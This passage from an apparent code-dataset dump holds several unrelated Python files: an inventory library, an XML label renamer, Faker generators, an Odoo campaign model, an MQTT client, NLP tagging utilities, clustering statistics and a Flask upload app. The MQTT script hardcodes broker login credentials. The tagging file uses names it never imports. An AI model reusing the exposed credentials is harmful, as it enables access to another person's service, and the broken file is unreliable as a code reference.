self.size)\"\"\"\n i, li = self._smart_index(link_index)\n self[i][li] = value\n\n def smart_get(self, link_index: int) -> Any:\n \"\"\"Get a value from a link in a given index (The index should be less than self.size)\"\"\"\n i, li = self._smart_index(link_index)\n return self[i][li]\n\n def smart_pop(self, link_index: int) -> Any:\n \"\"\"Get and remove a value from a link in a given index (The index should be less than self.size)\"\"\"\n i, li = self._smart_index(link_index)\n return self[i].pop(li)\n\n def smart_remove(self, data: Any):\n \"\"\"Remove a value from a link. The first matching item on a link is removed. This, doesn't really remove all matching items.\"\"\"\n for link in self._links:\n if link is fsa_null:\n continue\n if data in link:\n link.remove(data)\n return\n\n def __eq__(self, other):\n \"\"\"Implement self==other\"\"\"\n if isinstance(other, LinkedFSA):\n return self._linkID == other._linkID\n\n\nclass Inventory:\n \"\"\"Inventory class\"\"\"\n\n def __init__(self, iname: str, size: int, *args):\n \"\"\"Init function\"\"\"\n self._name = iname\n self._array_list = LinkedFSA(FixedSizeArray(size, True))\n\n def extend_inventory(self, array: FixedSizeArray):\n \"\"\"Adding an Inventory array\"\"\"\n if array in self._array_list:\n raise SameIdentifierException(\n \"array is the same as this instance array.\")\n\n if array.allow_alloc is True:\n warnings.warn(\"array is allocate-able.\")\n array = array.new()\n self._array_list.append(array)\n\n def __setitem__(self, index: int, value: Any):\n \"\"\"Implement self[index] = value.\"\"\"\n return self.insert(index, value)\n\n def __getitem__(self, index: int):\n \"\"\"Implement self[index].\"\"\"\n return self._array_list.smart_get(index)\n\n def insert(self, index: int, data: Any):\n \"\"\"Insert an item from inventory\"\"\"\n self._array_list.smart_insert(index, data)\n\n def pop(self, index: int):\n \"\"\"Pop an item from inventory\"\"\"\n self._array_list.smart_pop(index)\n\n def remove(self, data: Any):\n \"\"\"Remove an item from inventory\"\"\"\n self._array_list.smart_remove(data)\n\n def detach_inventory(self, array_id):\n \"\"\"Release a inventory\"\"\"\n self._array_list.detach(array_id)\n\n def __repr__(self):\n return f\"Inventory({self._name})\"\n\n\ndef _main():\n fsa0 = FixedSizeArray(10, True)\n fsa1 = FixedSizeArray(10)\n lfsa = LinkedFSA(fsa0, fsa1)\n lfsa.smart_insert(19, None)\n lfsa.smart_get(19)\n inventory = Inventory('Inventory-0', 50)\n inventory.extend_inventory(FixedSizeArray(50, True))\n inventory[51] = None\n assert inventory[51] is None\n","repo_name":"RimuEirnarn/RPGSample","sub_path":"libinventory.py","file_name":"libinventory.py","file_ext":"py","file_size_in_byte":15715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39920868110","text":"#导入相关库\nimport numpy as np\nimport os\nimport shutil\nfrom tqdm import tqdm\n\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n\n\n\ndef rename_label(filename, xmlsPath):\n \"\"\"\n Parse xml file and return labels.\n 解析xml,并根据字典中的项目来修订新的名称\n \"\"\"\n anno_path = xmlsPath + filename\n tree = ET.parse(anno_path)\n root = tree.getroot()\n\n for obj in root.findall('object'): # 使用list not iter \n cls_name = obj.find('name').text.strip().lower() # 获取classname\n if cls_name == 'anquanlian\t\t\t\t\t static':\n obj.find('name').text = 'anquanlian'\n if cls_name == 'yusan\t\t\t\t static':\n obj.find('name').text = 'yusan'\n\n tree.write(anno_path, \"UTF-8\")\n\n\nif __name__ == \"__main__\":\n\n\n xmlsPath = 'G:/@@20200714/static/'\n for filename in tqdm(os.listdir(xmlsPath)):\n if filename[-4:] == '.xml':\n rename_label(filename, xmlsPath)\n","repo_name":"Mittenss2010/PythonPractice","sub_path":"tools/[Tools]【标注后期】重命名-label_rename.py","file_name":"[Tools]【标注后期】重命名-label_rename.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36003768117","text":"from enum import Enum\n\nfrom faker import Faker\n\n\nclass Person(Enum):\n FIRST_NAME = \"first_name\"\n LAST_NAME = \"last_name\"\n LANGUAGE_NAME = \"language_name\"\n PREFIX = \"prefix\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"first_name\": fake.first_name(),\n \"last_name\": fake.last_name(),\n \"language_name\": fake.language_name(),\n \"prefix\": fake.prefix()\n }\n\n\nclass FullProfile(Enum):\n FULL_PROFILE = \"profile\"\n\n @staticmethod\n def generate(fake: Faker):\n return fake.profile()\n\n\nclass SimpleProfile(Enum):\n SIMPLE_PROFILE = \"simple_profile\"\n\n @staticmethod\n def generate(fake: Faker):\n return fake.simple_profile()\n\n\nclass Address(Enum):\n ADDRESS = \"address\"\n BUILDING_NUMBER = \"building_number\"\n CITY = \"city\"\n COUNTRY = \"country\"\n COUNTRY_CODE = \"country_code\"\n POSTCODE = \"post_code\"\n STREET_ADDRESS = \"street_address\"\n STREET_NAME = \"street_name\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"address\": fake.address(),\n \"building_number\": fake.building_number(),\n \"city\": fake.city(),\n \"country\": fake.country(),\n \"country_code\": fake.country_code(),\n \"postcode\": fake.postcode(),\n \"street_address\": fake.street_address(),\n \"street_name\": fake.street_name()\n }\n\n\nclass Bank(Enum):\n ABA = \"aba\"\n BANK_COUNTRY = \"bank_country\"\n BBAN = \"bban\"\n IBAN = \"iban\"\n SWIFT = \"swift\"\n SWIFT8 = \"swift8\"\n SWIFT11 = \"swift11\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"aba\": fake.aba(),\n \"bank_country\": fake.bank_country(),\n \"bban\": fake.bban(),\n \"iban\": fake.iban(),\n \"swift\": fake.swift(),\n \"swift8\": fake.swift8(),\n \"swift11\": fake.swift11()\n }\n\n\nclass Airport(Enum):\n AIRPORT = \"airport\"\n AIRLINE = \"airline\"\n FLIGHT = \"flight\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"airport\": fake.airport_object(),\n \"airline\": fake.airline(),\n \"flight\": fake.flight()\n }\n\n\nclass Schools(Enum):\n SCHOOL = \"school\"\n\n @staticmethod\n def generate(fake: Faker):\n return fake.school_object()\n\n\nclass Vehicule(Enum):\n VEHICULE = \"vehicule\"\n MACHINE_OBJECT = \"machine_object\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\"vehicule\": fake.vehicle_object(), \"machine\": fake.machine_object()}\n\n\nclass GeoPoint(Enum):\n LONGITUDE = \"longitude\"\n LATITUDE = \"latitude\"\n LAT_LONG = \"latlng\"\n LOCAL_LAT_LNG = \"local_latlng\"\n LOCATION_ON_LAND = \"location_on_land\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"longitude\": fake.longitude(),\n \"latitude\": fake.latitude(),\n \"lat_long\": fake.latlng(),\n \"local_lat_long\": fake.local_latlng(),\n \"location_on_land\": fake.location_on_land()\n }\n\n\nclass Properties(Enum):\n PERSON = \"person\"\n FULL_PROFILE = \"full_profile\"\n SIMPLE_PROFILE = \"simple_profile\"\n ADDRESS = \"address\"\n BANK = \"bank\"\n AIRPORT = \"airport\"\n SCHOOLS = \"schools\"\n VEHICULE = \"vehicule\"\n GEOPOINT = \"geo_point\"\n","repo_name":"yamess/FakeDataGeneratorAPI","sub_path":"src/data_generator/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17759940731","text":"from odoo import fields, models, api, _\n\n\nclass UtmCampaign(models.Model):\n _inherit = 'utm.campaign'\n\n mailing_whatsapp_ids = fields.One2many(\n comodel_name='mailing.mailing',\n inverse_name='campaign_id',\n domain=[('mailing_type', '=', 'whatsapp')],\n string='Mass Whatsapp',\n copy=True,\n )\n\n mailing_whatsapp_count = fields.Integer(\n string='Number of Mass Whatsapp',\n compute=\"_compute_mailing_whatsapp_count\",\n )\n\n @api.depends('mailing_whatsapp_ids')\n def _compute_mailing_whatsapp_count(self):\n for campaign in self:\n campaign.mailing_whatsapp_count = \\\n len(campaign.mailing_whatsapp_ids)\n\n # @api.depends('mailing_mailing_ids')\n # def _compute_mailing_mail_count(self):\n # for campaign in self:\n # qty_activities = campaign.mailing_mailing_ids.filtered(\n # lambda m: m.mailing_type == 'mail')\n # campaign.mailing_mail_count = len(qty_activities)\n\n def action_create_mass_whatsapp(self):\n action = self.env.ref('mass_mailing.action_create_mass_mailings_from_campaign').read()[0]\n action['context'] = {\n 'default_campaign_id': self.id,\n 'default_mailing_type': 'whatsapp',\n 'search_default_assigned_to_me': 1,\n 'search_default_campaign_id': self.id,\n 'default_user_id': self.env.user.id,\n 'mailing_sms': True,\n }\n return action\n\n def action_redirect_to_mailing_whatsapp(self):\n action = self.env.ref('mass_mailing.action_view_mass_mailings_from_campaign').read()[0]\n action['context'] = {\n 'default_campaign_id': self.id,\n 'default_mailing_type': 'whatsapp',\n 'search_default_assigned_to_me': 1,\n 'search_default_campaign_id': self.id,\n 'default_user_id': self.env.user.id,\n 'mailing_sms': True,\n }\n action['domain'] = [('mailing_type', '=', 'whatsapp')]\n return action\n\n def unlink(self):\n for mailing_id in self.mailing_mailing_ids:\n mailing_id.unlink()\n return super(UtmCampaign, self).unlink()\n","repo_name":"marcelsavegnago/social","sub_path":"mass_mailing_base/models/utm_campaign.py","file_name":"utm_campaign.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38472663570","text":"import paho.mqtt.client as mqtt\nfrom getch import getch\n\nTOPIC_PUSH = \"iot/data/iotmmsp1942978066trial/v1/85732072-22b7-4cd1-ae8f-d363975c0f91\"\nTOPIC_PULL = \"iot/push/iotmmsp1942978066trial/v1/85732072-22b7-4cd1-ae8f-d363975c0f91\"\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n if (rc == 0):\n print(\"Connected with success\")\n else:\n print(\"Connection aborted\")\n #FromDevice\n client.subscribe((TOPIC_PUSH, 1))\n #ToDevice\n client.subscribe((TOPIC_PULL, 1))\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\n#########################################\n# MAIN LOGIC\n#########################################\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.username_pw_set(\"capllkmg\", password=\"TYk-UHLw95TH\")\n\nclient.connect(\"m14.cloudmqtt.com\", 15839, 60)\n\nclient.loop_start()\n\nwhile True:\n key = getch()\n print(\"Pressed : \" + key)\n\n if key != \"\":\n client.publish(TOPIC_PULL, \"\")\n\n if key == \"q\":\n break\n","repo_name":"SmartTennisTable/net","sub_path":"broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39755314934","text":"from autogoal.datasets.ehealthkd20._utils import Collection, Sentence\n\n\ndef to_biluov(tokensxsentence, entitiesxsentence):\n labelsxsentence = []\n for tokens, entities in zip(tokensxsentence, entitiesxsentence):\n offset = 0\n labels = []\n for token in tokens:\n # Recently found that (token.idx, token.idx + len(token)) is the span\n matches = find_match(offset, offset + len(token.text), entities)\n tag = select_tag(matches)\n labels.append(tag)\n offset += len(token.text_with_ws)\n labelsxsentence.append(labels)\n\n return labelsxsentence # , \"BILUOV\"\n\n\ndef find_match(start, end, entities):\n def match(other):\n return other[0] <= start and end <= other[1]\n\n matches = []\n for spans in entities:\n\n # UNIT\n if len(spans) == 1:\n if match(spans[0]):\n matches.append((spans[0], \"U\"))\n continue\n\n # BEGIN\n begin, *tail = spans\n if match(begin):\n matches.append((begin, \"B\"))\n continue\n\n # LAST\n *body, last = tail\n if match(last):\n matches.append((last, \"L\"))\n continue\n\n # INNER\n for inner in body:\n if match(inner):\n matches.append((inner, \"I\"))\n break\n\n return matches\n\n\ndef select_tag(matches):\n if not matches:\n return \"O\"\n if len(matches) == 1:\n return matches[0][1]\n tags = [tag for _, tag in matches]\n return \"U\" if (\"U\" in tags and not \"B\" in tags and not \"L\" in tags) else \"V\"\n\n\ndef make_sentence(doc, bilouv, labels) -> Sentence:\n sentence = Sentence(doc.text)\n\n logger.debug(f\"[make_sentence]: doc.text={doc.text}\")\n logger.debug(f\"[make_sentence]: bilouv={bilouv}\")\n\n labels = set(l[2:] for l in labels if l != \"O\")\n\n for label in labels:\n specific_bilouv = []\n\n for tag in bilouv:\n if tag.endswith(label):\n tag = tag[0]\n specific_bilouv.append(tag[0])\n else:\n specific_bilouv.append(\"O\")\n\n logger.debug(\n f\"[make_sentence]: label={label} specific_bilouv={specific_bilouv}\"\n )\n\n spans = from_biluov(specific_bilouv, doc, spans=True)\n sentence.keyphrases.extend(\n Keyphrase(sentence, label, i, sp) for i, sp in enumerate(spans)\n )\n\n return sentence\n\n\ndef from_biluov(biluov, sentence, *, spans=False, drop_remaining=[]):\n \"\"\"\n >>> from_biluov(list('BBULL'), 'A B C D E'.split())\n [['C'], ['B', 'D'], ['A', 'E']]\n \"\"\"\n\n entities = [x for x in discontinuous_match(biluov, sentence)]\n\n for i, (tag, word) in enumerate(zip(biluov, sentence)):\n if tag == \"U\":\n entities.append([word])\n biluov[i] = \"O\"\n elif tag == \"V\":\n biluov[i] = \"I\"\n\n # only BILO is left!!!\n changed = True\n while changed:\n changed = False\n one_shot = enumerate(zip(biluov, sentence))\n try:\n i, (tag, word) = next(one_shot)\n while True:\n if tag != \"B\":\n i, (tag, word) = next(one_shot)\n continue\n\n on_build = [(word, i)]\n\n i, (tag, word) = next(one_shot)\n while tag in (\"O\", \"I\"):\n if tag == \"I\":\n on_build.append(word)\n i, (tag, word) = next(one_shot)\n\n if tag == \"L\":\n entities.append([x for x, _ in on_build] + [word])\n for _, j in on_build:\n biluov[j] = \"O\"\n biluov[i] = \"O\"\n on_build.clear()\n changed = True\n except StopIteration:\n pass\n\n for i, (tag, word) in enumerate(zip(biluov, sentence)):\n if tag != \"O\" and tag not in drop_remaining:\n entities.append([word])\n\n return (\n entities\n if not spans\n else [[(t.idx, t.idx + len(t)) for t in tokens] for tokens in entities]\n )\n\n\ndef discontinuous_match(biluov, sentence):\n \"\"\"\n >>> discontinuous_match(['B','V','L'],['la', 'enfermedad', 'renal'])\n [['la', 'enfermedad', 'renal'], ['enfermedad']]\n >>> discontinuous_match(['O','V','I','L','O','I','L'],['el','cancer','de','pulmon','y','de','mama'])\n [['cancer', 'de', 'pulmon'], ['cancer', 'de', 'mama']]\n >>> discontinuous_match(['B','O','B','V'],['tejidos','y','organos','humanos'])\n [['organos', 'humanos'], ['tejidos', 'humanos']]\n >>> discontinuous_match(['O','V','I','L','O','I','L','O','B','O','B','V'], ['el','cancer','de','pulmon','y','de','mama','y','tejidos','y','organos','humanos'])\n [['cancer', 'de', 'pulmon'], ['cancer', 'de', 'mama'], ['organos', 'humanos'], ['tejidos', 'humanos']]\n >>> discontinuous_match(list('BBULL'), 'A B C D E'.split())\n []\n \"\"\"\n entities = []\n for i, tag in enumerate(biluov):\n if tag != \"V\":\n continue\n for entity_ids in _full_overlap(biluov, list(range(len(sentence))), i):\n entity = []\n for idx in entity_ids:\n entity.append(sentence[idx])\n biluov[idx] = \"O\"\n entities.append(entity)\n return entities\n\n\ndef _full_overlap(biluov, sentence, index, product=False):\n \"\"\"\n INDEX TAG MUST BE 'V'\n >>> _full_overlap(['B','V','L'], list(range(3)), 1)\n [[0, 1, 2], [1]]\n >>> _full_overlap(['B','V','V','L'], list(range(4)), 1)\n [[0, 1, 2, 3], [1, 2]]\n >>> _full_overlap(['B','V','V','L'], list(range(4)), 2)\n [[0, 1, 2, 3], [1, 2]]\n >>> _full_overlap(['B','V','V','V','L'], list(range(5)), 1)\n [[0, 1, 2, 3, 4], [1, 2, 3]]\n >>> _full_overlap(['B','V','V','V','L'], list(range(5)), 2)\n [[0, 1, 2, 3, 4], [1, 2, 3]]\n >>> _full_overlap(['B','V','V','V','L'], list(range(5)), 3)\n [[0, 1, 2, 3, 4], [1, 2, 3]]\n >>> _full_overlap(['B','B','V','L','L'], list(range(5)), 2)\n [[1, 2, 3], [0, 2, 4]]\n >>> _full_overlap(['B','I','B','O','V','I','L','O','L'], list(range(9)), 4)\n [[2, 4, 5, 6], [0, 1, 4, 8]]\n >>> _full_overlap(['B','I','B','O','V','I','L','O','L'], list(range(9)), 4, True)\n [[2, 4, 5, 6], [2, 4, 8], [0, 1, 4, 5, 6], [0, 1, 4, 8]]\n >>> _full_overlap(['0','0','V','L'], list(range(4)), 2)\n [[2, 3], [2]]\n >>> _full_overlap(['V','L'], list(range(2)), 0)\n [[0, 1], [0]]\n >>> _full_overlap(['B','V','O','O'], list(range(4)), 1)\n [[0, 1], [1]]\n >>> _full_overlap(['B','V'], list(range(2)), 1)\n [[0, 1], [1]]\n >>> _full_overlap(['0','0','V','O','O'], list(range(5)), 2)\n []\n \"\"\"\n\n left = _right_to_left_overlap(biluov[: index + 1], sentence[: index + 1])\n right = _left_to_right_overlap(biluov[index:], sentence[index:])\n\n full = []\n if product:\n for l in left:\n for r in right:\n new = l + r[1:] if len(l) > len(r) else l[:-1] + r\n full.append(new)\n else:\n for l, r in itt.zip_longest(left, right, fillvalue=[]):\n new = l + r[1:] if len(l) > len(r) else l[:-1] + r\n full.append(new)\n return full\n\n\ndef _left_to_right_overlap(biluov, sentence):\n \"\"\"\n LEFTMOST TAG MUST BE 'V'\n >>> _left_to_right_overlap(['V', 'V', 'O', 'V', 'I', 'L', 'O', 'I', 'L'], range(9))\n [[0, 1, 3, 4, 5], [0, 1, 3, 7, 8]]\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O'], range(4))\n []\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O', 'L'], range(5))\n [[0, 2, 4], [0, 2]]\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O', 'L', 'O', 'L'], range(8))\n [[0, 2, 4], [0, 2, 6]]\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O', 'L', 'I', 'L', 'V', 'L'], range(9))\n [[0, 2, 4], [0, 2, 5, 6]]\n \"\"\"\n return _build_overlap(biluov, sentence, \"L\")\n\n\ndef _right_to_left_overlap(biluov, sentence):\n \"\"\"\n RIGHTMOST TAG MUST BE 'V'\n >>> _right_to_left_overlap(['B', 'I', 'O', 'B', 'I', 'V', 'O', 'V', 'V'], range(9))\n [[3, 4, 5, 7, 8], [0, 1, 5, 7, 8]]\n >>> _right_to_left_overlap(['O', 'V', 'O', 'V'], range(4))\n []\n >>> _right_to_left_overlap(['B', 'O', 'V', 'O', 'V'], range(5))\n [[0, 2, 4], [2, 4]]\n >>> _right_to_left_overlap(['B', 'O', 'B', 'O', 'V', 'O', 'V'], range(7))\n [[2, 4, 6], [0, 4, 6]]\n >>> _right_to_left_overlap(['B', 'V', 'B', 'I', 'B', 'O', 'V', 'O', 'V'], range(9))\n [[4, 6, 8], [2, 3, 6, 8]]\n \"\"\"\n inverse = _build_overlap(reversed(biluov), reversed(sentence), \"B\")\n for x in inverse:\n x.reverse()\n return inverse\n\n\ndef _build_overlap(biluov, sentence, finisher):\n \"\"\"\n LEFTMOST TAG MUST BE 'V'\n \"\"\"\n\n one_shot = zip(biluov, sentence)\n tag, word = next(one_shot)\n\n prefix = []\n complete = []\n\n try:\n while tag in (\"V\", \"O\"):\n if tag == \"V\":\n prefix.append(word)\n tag, word = next(one_shot)\n\n on_build = []\n while tag in (\"O\", \"I\", \"U\", finisher):\n if tag == \"I\":\n on_build.append(word)\n elif tag == finisher:\n complete.append(prefix + on_build + [word])\n on_build.clear()\n elif tag == \"U\":\n complete.append([word])\n tag, word = next(one_shot)\n except StopIteration:\n pass\n\n if len(complete) == 1:\n complete.append(prefix)\n\n return complete\n","repo_name":"autogoal/autogoal","sub_path":"autogoal/datasets/ehealthkd20/_encoding.py","file_name":"_encoding.py","file_ext":"py","file_size_in_byte":9415,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"5"} +{"seq_id":"5227257536","text":"import numpy as np\nimport pandas as pd\nfrom scipy.special import comb\n\nfrom er_evaluation.data_structures import MembershipVector\n\n\ndef summary_statistics(membership, names=None):\n r\"\"\"\n Compute canonical set of summary statistics.\n\n This includes:\n\n * Number of clusters\n * Average cluster size\n * Matching rate\n * Hill numbers of order 0, 1, and 2\n\n If names are provided for each cluster elements then the following two statistics are also provided:\n\n * Homonymy rate (proportion of clusters where at least one name is shared with another cluster)\n * Name variation rate (proportion of clusters with name variation within them)\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n names (Series): Names associated with each cluster elements. Defaults to None.\n\n Returns:\n dict: Dictionary of summary statistics.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> summary_statistics(membership)\n {'number_of_clusters': 4, 'average_cluster_size': 2.0, 'matching_rate': 0.875, 'H0': 3, 'H1': 2.82842712474619, 'H2': 2.6666666666666665}\n \"\"\"\n membership = MembershipVector(membership)\n\n statistics = {\n \"number_of_clusters\": number_of_clusters(membership),\n \"average_cluster_size\": average_cluster_size(membership),\n \"matching_rate\": matching_rate(membership),\n \"H0\": cluster_hill_number(membership, alpha=0),\n \"H1\": cluster_hill_number(membership, alpha=1),\n \"H2\": cluster_hill_number(membership, alpha=2),\n }\n\n if names is not None:\n statistics.update(\n {\n \"homonymy_rate\": homonymy_rate(membership, names),\n \"name_variation_rate\": name_variation_rate(membership, names),\n }\n )\n\n return statistics\n\n\ndef number_of_clusters(membership):\n r\"\"\"\n Number of clusters in a given clustering.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n int: number of unique cluster identifiers. Note that NAs are not counted.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> number_of_clusters(membership)\n 4\n \"\"\"\n membership = MembershipVector(membership)\n\n return membership.nunique()\n\n\ndef number_of_links(membership):\n r\"\"\"\n Number of pairwise links associated with a given clustering.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n int: Number of pairs of elements belonging to the same cluster. Note that clusters identified by NA values are excluded.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> number_of_links(membership)\n 5.0\n\n \"\"\"\n membership = MembershipVector(membership)\n\n return np.sum(comb(cluster_sizes(membership), 2))\n\n\ndef matching_rate(membership):\n r\"\"\"\n Compute the **matching rate** for a given clustering.\n\n Matching rate:\n This is the proportion of elements belonging to clusters of size at least 2.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n int: Number of pairs of elements belonging to the same cluster. Note that clusters identified by NA values are excluded.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> matching_rate(membership)\n 0.875\n \"\"\"\n membership = MembershipVector(membership)\n\n counts = membership.groupby(membership).count()\n\n return (counts * (counts > 1)).sum() / membership.count()\n\n\ndef average_cluster_size(membership):\n \"\"\"\n Compute the average cluster size.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n float: Average cluster size.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> average_cluster_size(membership)\n 2.0\n \"\"\"\n membership = MembershipVector(membership)\n\n return cluster_sizes(membership).mean()\n\n\ndef cluster_sizes(membership):\n r\"\"\"\n Compute the size of each cluster.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n Series: Series indexed by cluster identifier and with values corresponding to cluster size. Note that NA cluster identifiers are excluded.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> cluster_sizes(membership)\n 1 2\n 2 2\n 3 1\n 4 3\n dtype: int64\n \"\"\"\n membership = MembershipVector(membership)\n\n return membership.groupby(membership).count()\n\n\ndef cluster_sizes_distribution(membership):\n r\"\"\"\n Compute the cluster size distribution\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n Series: Pandas Series indexed by distinct cluster sizes and with values corresponding to the number of clusters of that size.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> cluster_sizes_distribution(membership)\n 1 1\n 2 2\n 3 1\n dtype: int64\n \"\"\"\n membership = MembershipVector(membership)\n\n cs = cluster_sizes(membership)\n return cs.groupby(cs).count()\n\n\ndef cluster_hill_number(membership, alpha=1):\n r\"\"\"\n Compute Hill number of a given order.\n\n Hill numbers:\n The Hill number of order :math:`\\alpha \\geq 0` of a given probability distribution :math:`p_i`, :math:`i =0,1,2, \\dots`, is defined as\n\n .. math::\n\n H_\\alpha = \\left(\\sum_{i} p_i^{\\alpha} \\right)^{1/(1-\\alpha)}\n\n and continually extended at :math:`\\alpha =0, 1`. Here, we let :math:`p_i` be the proportion of clusters of size :math:`i`.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n alpha (int, optional): Order of the Hill Number. Defaults to 1.\n\n Returns:\n float: Hill number of order `alpha` for the given clustering.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> cluster_hill_number(membership, alpha=0)\n 3\n\n >>> cluster_hill_number(membership, alpha=1)\n 2.82842712474619\n\n >>> cluster_hill_number(membership, alpha=np.Inf)\n 2.0\n \"\"\"\n membership = MembershipVector(membership)\n\n cs_dist = cluster_sizes_distribution(membership)\n probs = cs_dist / np.sum(cs_dist)\n probs = probs[probs > 0]\n\n if alpha == 0:\n return len(probs)\n if alpha == 1:\n return np.exp(-np.sum(probs * np.log(probs)))\n if alpha == np.Inf:\n return 1 / np.max(probs)\n else:\n return np.sum(probs**alpha) ** (1 / (1 - alpha))\n\n\ndef homonymy_rate(membership, names):\n r\"\"\"\n Compute the homonymy rate of a given clustering with a set of associated names.\n\n Homonymy rate:\n The homonymy rate is the proportion of clusters that share a name with another cluster.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n names (Series): Series indexed by cluster elements and with values corresponding to the associated name. Note that the index of `membership` should be included in the index of `names`.\n\n Returns:\n float: homonymy rate\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> names = pd.Series(index=[1,2,3,4,5,6,7,8], data=[\"n1\", \"n2\", \"n3\", \"n4\", \"n3\", \"n1\", \"n2\", \"n8\"])\n >>> homonymy_rate(membership, names)\n 0.5\n \"\"\"\n membership = MembershipVector(membership)\n assert isinstance(names, pd.Series)\n assert all(membership.index.isin(names.index))\n\n df = pd.concat(\n {\"membership\": membership, \"name\": names},\n axis=1,\n join=\"inner\",\n copy=False,\n )\n\n names_count = df.name.groupby(df.name).count().reset_index(name=\"total_count\")\n name_count_per_cluster = df.groupby([\"name\", \"membership\"]).size().reset_index(name=\"cluster_count\")\n merged = name_count_per_cluster.merge(\n names_count,\n on=\"name\",\n copy=False,\n validate=\"m:1\",\n )\n merged[\"diff\"] = merged.total_count - merged.cluster_count\n\n return (merged.groupby(\"membership\").agg({\"diff\": \"max\"}) > 0).mean().values[0]\n\n\ndef name_variation_rate(membership, names):\n r\"\"\"\n Compute the name variation rate of a given clustering with a set of associated names.\n\n Name variation rate:\n The name variation rate is the proportion of clusters with name variation within.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n names (Series): Series indexed by cluster elements and with values corresponding to the associated name. Note that the index of `names` should exactly match the index of `membership`.\n\n Returns:\n float: Name variation rate.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> names = pd.Series(index=[1,2,3,4,5,6,7,8], data=[\"n1\", \"n2\", \"n3\", \"n4\", \"n3\", \"n1\", \"n2\", \"n8\"])\n >>> name_variation_rate(membership, names)\n 0.5\n \"\"\"\n membership = MembershipVector(membership)\n assert isinstance(names, pd.Series)\n assert all(membership.index.isin(names.index))\n\n joined = pd.concat(\n {\"membership\": membership, \"name\": names},\n axis=1,\n join=\"inner\",\n copy=False,\n )\n\n return (joined.groupby(\"membership\").nunique() > 1).mean().values[0]\n","repo_name":"Valires/er-evaluation","sub_path":"er_evaluation/summary/_summary.py","file_name":"_summary.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"5"} +{"seq_id":"72570244951","text":"from flask import Flask, make_response, request, render_template, jsonify\nfrom flask_bootstrap import Bootstrap\nfrom flask import Markup\nimport flask\nimport io\nimport csv\nimport pandas as pd\nimport numpy as np\nimport os\nfrom ols_summary import train_model as ols_tm\n\ndef print_head(df):\n head = df.head().to_html()\n return Markup(head)\n\napp = Flask(__name__)\n\n@app.route('/upload.html')\ndef upload():\n return flask.render_template('upload.html')\n\n@app.route('/head', methods=[\"POST\"])\ndef head():\n f = request.files['data_file']\n if not f:\n return \"No file\"\n df = pd.read_csv(f)\n df.to_csv('../data/df.csv')\n head = print_head(df)\n columns = list(df.columns)\n\n return flask.render_template(\n 'head.html',\n head = head,\n columns = columns\n )\n\n@app.route('/select_cols', methods=[\"POST\", \"GET\"])\ndef select_cols():\n # if request.method == 'POST':\n df = pd.read_csv('../data/df.csv')\n all_cols = list(df.columns)\n print('This is all_cols:', all_cols)\n # for col in cols:\n form_results = request.form\n print('request.form: ', request.form)\n cols_to_keep = list(form_results.keys())\n x_cols = cols_to_keep.copy()\n print('This is cols_to_keep:', cols_to_keep)\n print('This is x_cols: ', x_cols)\n for k, v in 